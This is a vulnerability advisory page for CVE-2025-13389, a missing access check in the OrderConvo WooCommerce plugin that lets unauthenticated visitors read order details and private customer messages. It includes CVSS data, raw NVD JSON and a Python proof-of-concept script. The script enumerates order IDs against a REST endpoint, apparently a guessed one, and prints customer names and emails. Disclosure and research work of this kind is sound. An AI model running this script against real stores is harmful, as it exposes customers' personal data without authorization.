Security Vulnerability Report
中文
CVE-2025-13389 CVSS 5.3 MEDIUM

CVE-2025-13389

Published: 2025-11-25 08:15:51
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Admin and Customer Messages After Order for WooCommerce: OrderConvo plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the `get_order_by_id()` function in all versions up to, and including, 14. This makes it possible for unauthenticated attackers to view sensitive WooCommerce order details and private conversation messages between customers and store administrators for any order by supplying an arbitrary order ID.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

OrderConvo plugin for WooCommerce <= 14 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys target = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com' # CVE-2025-13389 PoC - Unauthorized order data access # Target: OrderConvo plugin for WooCommerce order_ids = [1001, 1002, 1003, 1004, 1005] for order_id in order_ids: # Try to access order details without authentication url = f"{target}/wp-json/wcrest/v1/order/{order_id}" try: response = requests.get(url, timeout=10) if response.status_code == 200: data = response.json() print(f"[!] Order {order_id} accessible:") print(f" Customer: {data.get('billing_name', 'N/A')}") print(f" Email: {data.get('billing_email', 'N/A')}") print(f" Messages: {len(data.get('messages', []))} conversation(s)") elif response.status_code == 401: print(f"[-] Order {order_id} requires authentication") else: print(f"[*] Order {order_id}: Status {response.status_code}") except Exception as e: print(f"[!] Error accessing order {order_id}: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13389", "sourceIdentifier": "[email protected]", "published": "2025-11-25T08:15:51.010", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Admin and Customer Messages After Order for WooCommerce: OrderConvo plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the `get_order_by_id()` function in all versions up to, and including, 14. This makes it possible for unauthenticated attackers to view sensitive WooCommerce order details and private conversation messages between customers and store administrators for any order by supplying an arbitrary order ID."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/tags/14/includes/wprest.class.php#L142", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/trunk/includes/wprest.class.php#L142", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3439999/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9149d2c6-b6c7-430d-8886-c8c5de483220?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.